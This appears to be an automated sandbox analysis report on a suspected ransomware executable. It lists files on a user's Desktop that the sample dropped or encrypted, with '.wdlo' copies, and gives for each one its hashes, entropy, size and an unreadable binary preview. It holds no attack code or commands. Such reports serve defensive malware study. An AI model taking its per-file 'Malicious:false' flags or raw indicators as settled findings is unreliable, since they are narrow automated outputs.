                  Preview:BWDRW...H...<.X/...+),-S..#.Q...............qa.....1.<I\..........h=...I..}d&8.......m.?..}@V-...g!5n...H\f........h...k..?P......<u.......*....&A7.R..@. ..8.(P.<u..@.3.CX./S|.~Ic?6..K.)#.N.o.....G.e....]h..2.S5.{.[.s.../I.6.:..QJ.. wz.:$....+.....0.e.....&S.qN........ V:..^\,..Q1^...-.....W(...;.......j.G...K.=.L.Wy....?UBd.MQX.. `.x....B....!x...>$...q......1^..LJ....!.._.:Q*.b..2....E4(.r\.\...Gi.).....!........1."f'...<....Yo/.....6.>z.5)d<j..6...$..T..v......mL..]t..|....'....[D)d..!....c..,f.5...,R.U..%~.......=.2..MD.....g...].........r.|..1.Z@..Gp..n..+...."...w..B.z....#.l......v.=.".....C.K.........tS^.+.........3e...8.P...qU.....Z........B.,..1...&&.L....N..%X($.nE..m!.3.F...jMO...F..p-.*..r.n:.`..SEB|hIe3.Sls*..H.J).(....&.K...............y...........b...0.u}ii.o...n..#...1....N.....9...Yx.Vf.....E..'...\.....7.+Iv..kO....Z..A..R..k".G.$..*...Nb.C....<./).T.`.F.*LG~.}._.O.e...<.*...)l.].....p.<.rAH-l$q..Bt.Vosl...q..tm@.(*.....<s.......t

                  C:\Users\user\Desktop\LIJDSFKJZG\BXAJUJAOEO.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.869206987744506
                  Encrypted:false
                  SSDEEP:24:yoRDqx9aOyEsauU7RIFn7arJQ9wTB//VBsstz5ZXQSenCtW3zbD:7R5OyfauUl0n7eJ4ulVBtDA3nD
                  MD5:C7468CE00A69A64C7DCAE5189C7E7BDB
                  SHA1:777F7482BDA7F59B6E4D26674621D3E3F25CDB17
                  SHA-256:61EF7BBBD17854D27FE34389E86829ED54F6AE9BF75C12C88197779205F85839
                  SHA-512:8EA0D2EBAF0D57FFE264495D25CEEF07C3408AF2E423D613C226125AA70803B4E280FAF395F70F3D61C19AEC0508B1F8DE2C55BFF48E0B52ECEBF6C250F64136
                  Malicious:false
                  Preview:BXAJUG*.)..[..,.q&.h......Y...R.b.>.*.wG..aK...)..../..Y.p..v.d..f....Z..;.....g.M...... ...T.W.]...f...\d.3.8*..?."y....&...#Q....RX7...O.....W...^......Is...K..0.....3`...v.-.....k.z... 0.........I...T0...f......Q.:..`U.+.2....\HX.F.......c.Sp..aX....8.7../..c.......1HL.WW.......=.....1.E.b.._.E:...x...h.`E.!`..t,.^..Mg.(&s.Hq..Z8.C.k........a`.2.&...79...........L.s...aG.'.e..M.Zq.~Q.*m.....{x.c...;.{^......R2.29#......b............oy0..)&.%.g~.... ..Ff...........pG..L.@h.6...UPY.K......!....B..r.S./...-..l....].V.6?0..:....[h.%.Sc.5.;......3.0.a....X....aV.Y...l...i.1.<.a;E.....a>.l..>..v<...q..9m.+..._..@.P..V..`O...!.R.....#g.qh.0,.8...].!3=}S..-|..{.Xp...{...K..q.h....{JT...I.-...yGM~.?.4>>.... ...75Bvhk.....9.e$2g.y]#...&...w.9.{.G......f/..(6..C.Ab....5...........n<_z.|l.....;._n.....J.,.S^....W.m=U..R..t^(.O'...l...@=j...K..........F..;He0^...+Z\..]r....T........O......,.H...as..........a.. .ozI.,..D......=.....r..d......i.7..G.

                  C:\Users\user\Desktop\LIJDSFKJZG\BXAJUJAOEO.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.869206987744506
                  Encrypted:false
                  SSDEEP:24:yoRDqx9aOyEsauU7RIFn7arJQ9wTB//VBsstz5ZXQSenCtW3zbD:7R5OyfauUl0n7eJ4ulVBtDA3nD
                  MD5:C7468CE00A69A64C7DCAE5189C7E7BDB
                  SHA1:777F7482BDA7F59B6E4D26674621D3E3F25CDB17
                  SHA-256:61EF7BBBD17854D27FE34389E86829ED54F6AE9BF75C12C88197779205F85839
                  SHA-512:8EA0D2EBAF0D57FFE264495D25CEEF07C3408AF2E423D613C226125AA70803B4E280FAF395F70F3D61C19AEC0508B1F8DE2C55BFF48E0B52ECEBF6C250F64136
                  Malicious:false
                  Preview:BXAJUG*.)..[..,.q&.h......Y...R.b.>.*.wG..aK...)..../..Y.p..v.d..f....Z..;.....g.M...... ...T.W.]...f...\d.3.8*..?."y....&...#Q....RX7...O.....W...^......Is...K..0.....3`...v.-.....k.z... 0.........I...T0...f......Q.:..`U.+.2....\HX.F.......c.Sp..aX....8.7../..c.......1HL.WW.......=.....1.E.b.._.E:...x...h.`E.!`..t,.^..Mg.(&s.Hq..Z8.C.k........a`.2.&...79...........L.s...aG.'.e..M.Zq.~Q.*m.....{x.c...;.{^......R2.29#......b............oy0..)&.%.g~.... ..Ff...........pG..L.@h.6...UPY.K......!....B..r.S./...-..l....].V.6?0..:....[h.%.Sc.5.;......3.0.a....X....aV.Y...l...i.1.<.a;E.....a>.l..>..v<...q..9m.+..._..@.P..V..`O...!.R.....#g.qh.0,.8...].!3=}S..-|..{.Xp...{...K..q.h....{JT...I.-...yGM~.?.4>>.... ...75Bvhk.....9.e$2g.y]#...&...w.9.{.G......f/..(6..C.Ab....5...........n<_z.|l.....;._n.....J.,.S^....W.m=U..R..t^(.O'...l...@=j...K..........F..;He0^...+Z\..]r....T........O......,.H...as..........a.. .ozI.,..D......=.....r..d......i.7..G.

                  C:\Users\user\Desktop\LIJDSFKJZG\LIJDSFKJZG.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8475087559437045
                  Encrypted:false
                  SSDEEP:24:Z8MTBsicXXmPI/Kt5ce6FS0XrnqOhNRliJN+8mYKc2SI0eY3zbD:ZPFsdXXmn7ce6FS07qr7UYRI0b3nD
                  MD5:5D7CAC56615FB9A9C0ED900606325B5E
                  SHA1:01B93742399FF44159B8A0FD8F785E3811EA810A
                  SHA-256:33F42AA48E78E2925E3B08B2EC5694E688598DCF2C52D565086CF4CF8AA56597
                  SHA-512:DE65BB7878156F8E09222E0AE514A6C8BFB16BBDC29F0064C1726C3096488893DEA8954F8A17B10299EB9CDB941B56CA019143EC0CF62477C25CF21ECC0472B7
                  Malicious:false
                  Preview:LIJDS...Bl.US.....WN?...+.4E+......$@/<.e.z..w..VW '..O...... ..,...O.;.j......wQ.T.....M...#......)..{..9.e[...|.L......i.%*...9...5L..E.Vs.S.5.MP.p....9..JG....L..[.E.}..y.X...H.....rP.. .,.xT}....T[xjw......a.}%.W.0.ga....7s.gL....<.^.&.c..W..........x.......|q..1.6.|X...4.........$.......:(.I.....:..(C..;..9.t..M...E..'k.$M....U.}.B..ObD.....8..s..J...i..EO2..U.....C.`........0.....Sd.F.1..l..#.y..K..-uyY..>9C.F,.V...w.:i.(.^..4...[..d.s....l.z)t.\ks./.Y.......!.......k.`..,...%.(.4Vf4..1\w.,..B3%..h.H.47....`i!..`.B..+.RpM.C...,f..L.Z^...l.IUm.J._.avv..........e...54..xL.W$.C....b...6..h...e..H.c.U..H.47....Z.}Z.V>...;.....O......B.z.J!..Bx.K".@....\.9 ..Qk1...n....x.@@.PlG.s....5...+.i.....`o.(..3.&..B..R.+.........+../).X~L^r...2;n..t.Y.M;.X|........1d..&....:+.^P..<B.#U...h..]w.&I.4 .8Z(:..5.9.i3.@....yV..)a...4.1;.....C$r..vj-C<.#3..".....,.H...!.^.f..]...P...P.=..F.2.z ZF.o...;..f.....*.[.-....0g.........n..l..s......@..cm...S.Y

                  C:\Users\user\Desktop\LIJDSFKJZG\LIJDSFKJZG.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8475087559437045
                  Encrypted:false
                  SSDEEP:24:Z8MTBsicXXmPI/Kt5ce6FS0XrnqOhNRliJN+8mYKc2SI0eY3zbD:ZPFsdXXmn7ce6FS07qr7UYRI0b3nD
                  MD5:5D7CAC56615FB9A9C0ED900606325B5E
                  SHA1:01B93742399FF44159B8A0FD8F785E3811EA810A
                  SHA-256:33F42AA48E78E2925E3B08B2EC5694E688598DCF2C52D565086CF4CF8AA56597
                  SHA-512:DE65BB7878156F8E09222E0AE514A6C8BFB16BBDC29F0064C1726C3096488893DEA8954F8A17B10299EB9CDB941B56CA019143EC0CF62477C25CF21ECC0472B7
                  Malicious:false
                  Preview:LIJDS...Bl.US.....WN?...+.4E+......$@/<.e.z..w..VW '..O...... ..,...O.;.j......wQ.T.....M...#......)..{..9.e[...|.L......i.%*...9...5L..E.Vs.S.5.MP.p....9..JG....L..[.E.}..y.X...H.....rP.. .,.xT}....T[xjw......a.}%.W.0.ga....7s.gL....<.^.&.c..W..........x.......|q..1.6.|X...4.........$.......:(.I.....:..(C..;..9.t..M...E..'k.$M....U.}.B..ObD.....8..s..J...i..EO2..U.....C.`........0.....Sd.F.1..l..#.y..K..-uyY..>9C.F,.V...w.:i.(.^..4...[..d.s....l.z)t.\ks./.Y.......!.......k.`..,...%.(.4Vf4..1\w.,..B3%..h.H.47....`i!..`.B..+.RpM.C...,f..L.Z^...l.IUm.J._.avv..........e...54..xL.W$.C....b...6..h...e..H.c.U..H.47....Z.}Z.V>...;.....O......B.z.J!..Bx.K".@....\.9 ..Qk1...n....x.@@.PlG.s....5...+.i.....`o.(..3.&..B..R.+.........+../).X~L^r...2;n..t.Y.M;.X|........1d..&....:+.^P..<B.#U...h..]w.&I.4 .8Z(:..5.9.i3.@....yV..)a...4.1;.....C$r..vj-C<.#3..".....,.H...!.^.f..]...P...P.=..F.2.z ZF.o...;..f.....*.[.-....0g.........n..l..s......@..cm...S.Y

                  C:\Users\user\Desktop\LIJDSFKJZG\PWZOQIFCAN.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.849344962989548
                  Encrypted:false
                  SSDEEP:24:5AAgQnvolWbfeScCMzy4ROZBZMVH1uZIVOjNyd2sl/DhmmU3zbD:+WnjGScLd4ZvMF1x2o43nD
                  MD5:0B264A6A0200C5DE19553840CC2C37A5
                  SHA1:910726CE1C029EEA5E9BD9F169FC5C3D17D240A9
                  SHA-256:57AF4080F6BE1957E9F6181CC1494A6DA3D2415582184D10EA05981A9196D8FF
                  SHA-512:CB1C9FA0B402D27CD52194C36767C5CE21DC8240ABFAA35485786E2D9F3C9904A184BB6930C814F54FC61D92EB0AB255CBB386DC4DA8AE97ECC3AE70E357CEFD
                  Malicious:false
                  Preview:PWZOQ.!.<..}.[.6A}|Y...Av`....D..A.!......L.. .HI..q..*../.q./.SC0.N:../.P.XC.dD }}. ...G&..U....q.j....w....V.z.~.....}P....Mv..&.....]..#..g..t...c.Z.....n.O.K.f..e...).).S.4.../n..Z"...vw.s$..1...m.....T...F../.B]....I.%4}...].@..[......!..O.m....[:...3.dh4....V.O>@..I+....../.<...]g.,,.....I..D.......oF..9...+TW.BH$.?].........ST.m>...yQY.....9.....v.~..g..W..g.".?...%>.B.6...g.o=MNH..+Z.Z6...a..._..0)...U\8 [.....=...^+.U]..c .;.....\<?..W.o.....M.7........J.....;......o|..Z/I......C)..PUym..*.fc.P....].\>.m.t7v.8(..W'..<.]..>W>...#.Ju..x.4.=..}k..9&.O..?...........eE.X..a..'.y.G...u:..b..8IOu.....6N.^|.r.P.],.....n....^..`{'.~..8.E...J...>..#.5.Y.W...3.ru.HCE..$?..L..m@.!.z..6t....g.bS"..pEL..bh>.*4Y...@$^.**..7d..v.)..._..I....AZG...U2..`$.V.Y.fY.?.m......H.F....n.E\.K..{a..>....o........!y-...Qp..Q....6b(P......{.r.z"..R.j#.z.|.iWs;.Z..AI.>.z&o.......`.:}..p...e.<H.."#.W..w.......lmA..(..........}.#m..5i....H`,1?......A.

                  C:\Users\user\Desktop\LIJDSFKJZG\PWZOQIFCAN.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.849344962989548
                  Encrypted:false
                  SSDEEP:24:5AAgQnvolWbfeScCMzy4ROZBZMVH1uZIVOjNyd2sl/DhmmU3zbD:+WnjGScLd4ZvMF1x2o43nD
                  MD5:0B264A6A0200C5DE19553840CC2C37A5
                  SHA1:910726CE1C029EEA5E9BD9F169FC5C3D17D240A9
                  SHA-256:57AF4080F6BE1957E9F6181CC1494A6DA3D2415582184D10EA05981A9196D8FF
                  SHA-512:CB1C9FA0B402D27CD52194C36767C5CE21DC8240ABFAA35485786E2D9F3C9904A184BB6930C814F54FC61D92EB0AB255CBB386DC4DA8AE97ECC3AE70E357CEFD
                  Malicious:false
                  Preview:PWZOQ.!.<..}.[.6A}|Y...Av`....D..A.!......L.. .HI..q..*../.q./.SC0.N:../.P.XC.dD }}. ...G&..U....q.j....w....V.z.~.....}P....Mv..&.....]..#..g..t...c.Z.....n.O.K.f..e...).).S.4.../n..Z"...vw.s$..1...m.....T...F../.B]....I.%4}...].@..[......!..O.m....[:...3.dh4....V.O>@..I+....../.<...]g.,,.....I..D.......oF..9...+TW.BH$.?].........ST.m>...yQY.....9.....v.~..g..W..g.".?...%>.B.6...g.o=MNH..+Z.Z6...a..._..0)...U\8 [.....=...^+.U]..c .;.....\<?..W.o.....M.7........J.....;......o|..Z/I......C)..PUym..*.fc.P....].\>.m.t7v.8(..W'..<.]..>W>...#.Ju..x.4.=..}k..9&.O..?...........eE.X..a..'.y.G...u:..b..8IOu.....6N.^|.r.P.],.....n....^..`{'.~..8.E...J...>..#.5.Y.W...3.ru.HCE..$?..L..m@.!.z..6t....g.bS"..pEL..bh>.*4Y...@$^.**..7d..v.)..._..I....AZG...U2..`$.V.Y.fY.?.m......H.F....n.E\.K..{a..>....o........!y-...Qp..Q....6b(P......{.r.z"..R.j#.z.|.iWs;.Z..AI.>.z&o.......`.:}..p...e.<H.."#.W..w.......lmA..(..........}.#m..5i....H`,1?......A.

                  C:\Users\user\Desktop\LIJDSFKJZG\WHZAGPPPLA.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.847890942843731
                  Encrypted:false
                  SSDEEP:24:r6mo/Zt8TM6unfREyI8dByKHumHXFM86AAwjlQ4G++3gqm2422Jlcc3zbD:5o/cj4IKUKOE/U4LkV8Ff3nD
                  MD5:8582BCB1562F5C87D58BF44EF37001F1
                  SHA1:2C7BBF67BA3F36EB58E066FE2F664D9D92EC0A32
                  SHA-256:D99DAA6EE987E4B94023B7E5184E2850B7EB5A8A79EECBFFD49C4A4E476CD9A6
                  SHA-512:392DC582FB60793E9670000A69E852B7CED8558D1CDB5F36273E73AF5513781D9BB312407BD8D0286E7A3D44F6115022FA02AD03DD34DEB4BDC171ED5DAFD870
                  Malicious:false
                  Preview:WHZAG...............J.u.5..t..D.'...Og.3./..Y.....gK0_&..e.R0y&.?...=[.6D.KSxi5...Cu_.\/..'.$a.....2....!..r.qN..C..f.A...]>........=..A..O.^l.n=*T.o?.Uc..-.__y.Tl...+..0.O.`#...FI8t{b~.6\o..(c..zV.8i.5.`.7.?...?t.7..4.@..x....5 .......jTl.+l.A.d....Y;.rY..#.+:<.m.^.....:..D......<q.C.... ..NR.H..0..M.?s.a...[!D.;.Q{.2JC.lo...V........h..i.G...6O..V.....j.s+S*5.Je!...KP.{....M....k...M.|.....j..-...K.V{9...........QIP..Y.j$.........O..#l.f... .GfM..;..J*.X......8.%8.......].&..c..q.6..mLH..h`:.....]'....N.e3J]....?....jXW....V...OH.5......h..X.}...Y.......<OZ....e..w.olT.j.E0.D&..'.............r|J.i....*..$+O.P&.~?...[....sU5.X.Sm.QU........Ma....4K.t'N.h{.)q.8.u.O~:..2.u..]..4$i....aj.n.....Z.P..G7+.\P...C.}'..m...p.0..q.!.Ao.......K...zb3......_.W5.q9X...|...F.qr...z...w.Z=do...>..5.....%..,.Q^{.R...Aq......k+.^...9o..6....A.O..J4N|...P._..,..0..R.\.:...k..i......b..B.(>...,nh...CG......M.8...o.k.bk9...3..*.G.X..S.x..U6.a|X....3.J

                  C:\Users\user\Desktop\LIJDSFKJZG\WHZAGPPPLA.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.847890942843731
                  Encrypted:false
                  SSDEEP:24:r6mo/Zt8TM6unfREyI8dByKHumHXFM86AAwjlQ4G++3gqm2422Jlcc3zbD:5o/cj4IKUKOE/U4LkV8Ff3nD
                  MD5:8582BCB1562F5C87D58BF44EF37001F1
                  SHA1:2C7BBF67BA3F36EB58E066FE2F664D9D92EC0A32
                  SHA-256:D99DAA6EE987E4B94023B7E5184E2850B7EB5A8A79EECBFFD49C4A4E476CD9A6
                  SHA-512:392DC582FB60793E9670000A69E852B7CED8558D1CDB5F36273E73AF5513781D9BB312407BD8D0286E7A3D44F6115022FA02AD03DD34DEB4BDC171ED5DAFD870
                  Malicious:false
                  Preview:WHZAG...............J.u.5..t..D.'...Og.3./..Y.....gK0_&..e.R0y&.?...=[.6D.KSxi5...Cu_.\/..'.$a.....2....!..r.qN..C..f.A...]>........=..A..O.^l.n=*T.o?.Uc..-.__y.Tl...+..0.O.`#...FI8t{b~.6\o..(c..zV.8i.5.`.7.?...?t.7..4.@..x....5 .......jTl.+l.A.d....Y;.rY..#.+:<.m.^.....:..D......<q.C.... ..NR.H..0..M.?s.a...[!D.;.Q{.2JC.lo...V........h..i.G...6O..V.....j.s+S*5.Je!...KP.{....M....k...M.|.....j..-...K.V{9...........QIP..Y.j$.........O..#l.f... .GfM..;..J*.X......8.%8.......].&..c..q.6..mLH..h`:.....]'....N.e3J]....?....jXW....V...OH.5......h..X.}...Y.......<OZ....e..w.olT.j.E0.D&..'.............r|J.i....*..$+O.P&.~?...[....sU5.X.Sm.QU........Ma....4K.t'N.h{.)q.8.u.O~:..2.u..]..4$i....aj.n.....Z.P..G7+.\P...C.}'..m...p.0..q.!.Ao.......K...zb3......_.W5.q9X...|...F.qr...z...w.Z=do...>..5.....%..,.Q^{.R...Aq......k+.^...9o..6....A.O..J4N|...P._..,..0..R.\.:...k..i......b..B.(>...,nh...CG......M.8...o.k.bk9...3..*.G.X..S.x..U6.a|X....3.J

                  C:\Users\user\Desktop\LIJDSFKJZG\WSHEJMDVQC.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.82583219082714
                  Encrypted:false
                  SSDEEP:24:+FswP82QQcC2TLOMdFQP3lwoTbPuv3MP3Gvftz09W9eCYd7JaYyW3zbD:+FREw2eMd437TLY3MuHtQ9W93UYY33nD
                  MD5:8DC6D1F6A435B844B6E03D434AF4D3A6
                  SHA1:D8FD1DC515224E50055E755795AB1D0ED70868F0
                  SHA-256:EA2BE9EBE7D6A41E237616A8F9344CBD01825F71678593917DF4E575DAC91FF7
                  SHA-512:9CC6C260AEDC0AF597EDF635757589FB25DCF5AEE1BC38B716E2CB4D049AD7AD68A6850C88F7AD0B51E2B60EFA4D6880BFB8C36C6D237040F2EFCF0E84C4081D
                  Malicious:false
                  Preview:WSHEJ..79...(...i:N9 ...'.;"..C.G...g.px.Jlc\up...h..}..X.~qn..;..o.. .%..._..V.[_zH..B.W[._..ck....Da(kL.+2..Gm/..pD..cR.T.3tlQ..L..l....f.Y1MF.].q...\~..E...``.!..Us!.46..T.4...u..`...)m}6..Wj....`Vq`Ey..J..g.E.....Wn|wF..y..3*....|.........H...<.-.......C.X..*.u...$.a..=Y..U...{p4...7.".q6[L..0F...)......_.j.....<.pJ..m..\K.I.>.#...._ipW)..T..&..$.?..]...4)./.O.N.9.@......].vI.7k\.$...8g;...A........ ........w.4.>..."...Nk.Tj..=.d..+,..5ff.6...~.5....7.}.x..T%g$...O.2.9.O..tK...#.qvv....._...f].qy.#....S...c..%.....#`G.Z..%...hcZ..S.u..'L\.2'.j.8.>.....%m.@...........;^...S..]........Y7........2. lL..OR.................~hcM..3NE..E....OV......S......:&p....h.I.2.+..B...~Ub._P.l\m.l.d.......O..iX.&..q>.....e....~.M..5.......I....9.zB....Y........3.\......_...f)(.>....i.JrFN.x1...&|....}.WH@SZ.....kqSHL.e...(..l.\.i..Y.!u..~..ePjh.xL.5.c...B.....y.B.:7...>.-..d."<CB..S.(s...7.Y......uDmv.......e.gmD.p..}.V..RoLn...h.G..t.LM_..U....^

                  C:\Users\user\Desktop\LIJDSFKJZG\WSHEJMDVQC.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.82583219082714
                  Encrypted:false
                  SSDEEP:24:+FswP82QQcC2TLOMdFQP3lwoTbPuv3MP3Gvftz09W9eCYd7JaYyW3zbD:+FREw2eMd437TLY3MuHtQ9W93UYY33nD
                  MD5:8DC6D1F6A435B844B6E03D434AF4D3A6
                  SHA1:D8FD1DC515224E50055E755795AB1D0ED70868F0
                  SHA-256:EA2BE9EBE7D6A41E237616A8F9344CBD01825F71678593917DF4E575DAC91FF7
                  SHA-512:9CC6C260AEDC0AF597EDF635757589FB25DCF5AEE1BC38B716E2CB4D049AD7AD68A6850C88F7AD0B51E2B60EFA4D6880BFB8C36C6D237040F2EFCF0E84C4081D
                  Malicious:false
                  Preview:WSHEJ..79...(...i:N9 ...'.;"..C.G...g.px.Jlc\up...h..}..X.~qn..;..o.. .%..._..V.[_zH..B.W[._..ck....Da(kL.+2..Gm/..pD..cR.T.3tlQ..L..l....f.Y1MF.].q...\~..E...``.!..Us!.46..T.4...u..`...)m}6..Wj....`Vq`Ey..J..g.E.....Wn|wF..y..3*....|.........H...<.-.......C.X..*.u...$.a..=Y..U...{p4...7.".q6[L..0F...)......_.j.....<.pJ..m..\K.I.>.#...._ipW)..T..&..$.?..]...4)./.O.N.9.@......].vI.7k\.$...8g;...A........ ........w.4.>..."...Nk.Tj..=.d..+,..5ff.6...~.5....7.}.x..T%g$...O.2.9.O..tK...#.qvv....._...f].qy.#....S...c..%.....#`G.Z..%...hcZ..S.u..'L\.2'.j.8.>.....%m.@...........;^...S..]........Y7........2. lL..OR.................~hcM..3NE..E....OV......S......:&p....h.I.2.+..B...~Ub._P.l\m.l.d.......O..iX.&..q>.....e....~.M..5.......I....9.zB....Y........3.\......_...f)(.>....i.JrFN.x1...&|....}.WH@SZ.....kqSHL.e...(..l.\.i..Y.!u..~..ePjh.xL.5.c...B.....y.B.:7...>.-..d."<CB..S.(s...7.Y......uDmv.......e.gmD.p..}.V..RoLn...h.G..t.LM_..U....^

                  C:\Users\user\Desktop\NIRMEKAMZH.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.829827325919233
                  Encrypted:false
                  SSDEEP:24:7EjPoKc3UzwPcVnpiGVUY0shFXY/Xsmp8YUOnbrwNCVP6Jv2/3zbD:7EjPoKc3SUc9DUWH6kcbfV4v2/3nD
                  MD5:F18F72DED9C322B1297107D16BA74C40
                  SHA1:14B24CC252498222A72AE86242C538C434D27C27
                  SHA-256:864F2B1B72093C6F4F20209376FFC9319B03B1E5E25B6E661CA53823AF5209AD
                  SHA-512:A8E6B9661BE9EA70778D8DEDEDE79056B22FE453F7AC00606BA1E0181549159C202EE70B0E46370D0C1F8FD507D4008033784E7D89F0AA4494F2C77AC6110E54
                  Malicious:false
                  Preview:NIRME.2F.N..u..........|D...O..Ty8qn.55'5.-.....S....52M....1.N...a.-..'K.m..l..v+.......m.h.G.........<..|k.....]....."|r....x...UtX..B...'.f.z9.+En..Q@...1],.[Q.H.f..ln...1mP.~.LJ..A(.HAf_.|jy.......X..i...X.......<p...h.X..dTx:"...A..../.......-..Z.$O.;*..4.n.5n.QU.........H..u..Sci..a....%.=...lv...."...OU(..QuW..[...&..,qp...v..?Zd..-..Bf..>u.9!...../Z.......M.........V.@].!.........r.u.. u8.U...9t.hA..0:.....CGw.e.....E..O..E_z...*.-rU.r.....-.,C.8.d..[}..K;."..n..d...T.v/......"..:MA....t...8>...."Dm.".f.76.....G.s..<.,.qs......}..@.(..V"..t....!.Y.I+x}.......w|Q.'..<...Z11...-....Os..Y.L.wy.6.[.[......F0...|..?Y.....&.+...7S.m...w2....I..L.(N..e..~;.N..+..o..f.<.I...E..&)R..i...E5..W[.r.....E.0G..P...u..ko..#....[....n~W.......U....$...6..2..1...?.m.h.v.b.Lq.56...)....X.x}.E...}.Y.V..xL.>....u"&..:rC....`2.e...,.&?...b.rrx...J.Rjc..H.,...&.)...UG..`..F..x....1...........!.F.5..>...2.......S......j?..3...pkRt..:&.L..*.3

                  C:\Users\user\Desktop\NIRMEKAMZH.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.829827325919233
                  Encrypted:false
                  SSDEEP:24:7EjPoKc3UzwPcVnpiGVUY0shFXY/Xsmp8YUOnbrwNCVP6Jv2/3zbD:7EjPoKc3SUc9DUWH6kcbfV4v2/3nD
                  MD5:F18F72DED9C322B1297107D16BA74C40
                  SHA1:14B24CC252498222A72AE86242C538C434D27C27
                  SHA-256:864F2B1B72093C6F4F20209376FFC9319B03B1E5E25B6E661CA53823AF5209AD
                  SHA-512:A8E6B9661BE9EA70778D8DEDEDE79056B22FE453F7AC00606BA1E0181549159C202EE70B0E46370D0C1F8FD507D4008033784E7D89F0AA4494F2C77AC6110E54
                  Malicious:false
                  Preview:NIRME.2F.N..u..........|D...O..Ty8qn.55'5.-.....S....52M....1.N...a.-..'K.m..l..v+.......m.h.G.........<..|k.....]....."|r....x...UtX..B...'.f.z9.+En..Q@...1],.[Q.H.f..ln...1mP.~.LJ..A(.HAf_.|jy.......X..i...X.......<p...h.X..dTx:"...A..../.......-..Z.$O.;*..4.n.5n.QU.........H..u..Sci..a....%.=...lv...."...OU(..QuW..[...&..,qp...v..?Zd..-..Bf..>u.9!...../Z.......M.........V.@].!.........r.u.. u8.U...9t.hA..0:.....CGw.e.....E..O..E_z...*.-rU.r.....-.,C.8.d..[}..K;."..n..d...T.v/......"..:MA....t...8>...."Dm.".f.76.....G.s..<.,.qs......}..@.(..V"..t....!.Y.I+x}.......w|Q.'..<...Z11...-....Os..Y.L.wy.6.[.[......F0...|..?Y.....&.+...7S.m...w2....I..L.(N..e..~;.N..+..o..f.<.I...E..&)R..i...E5..W[.r.....E.0G..P...u..ko..#....[....n~W.......U....$...6..2..1...?.m.h.v.b.Lq.56...)....X.x}.E...}.Y.V..xL.>....u"&..:rC....`2.e...,.&?...b.rrx...J.Rjc..H.,...&.)...UG..`..F..x....1...........!.F.5..>...2.......S......j?..3...pkRt..:&.L..*.3

                  C:\Users\user\Desktop\PWZOQIFCAN.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.844381624751119
                  Encrypted:false
                  SSDEEP:24:5+c0dVsRfjboNOJ7ywdlEDp1iNuN6bdhaQny/bISoe5EKyDxX0kFfo4S3zbD:T0MRTy2lEyNndQOy/b67NDxXp43nD
                  MD5:466581921A8915BA8F21A8CD56C6870D
                  SHA1:CA70B62578EF81657C7CFD59347303576DBFDB01
                  SHA-256:7B2261936B847731BC5BCD60C473D7B1F1F4836DB5B492A64FCB288E8E924FBD
                  SHA-512:5ED0C595A8166DE30311B02BFD83096A82E0A734B85A95FCF6DB910FCB0874DEB28D92EDCA407B1EE0142D814D6596610D2088038D4412FCB4E61F19C409B9A3
                  Malicious:false
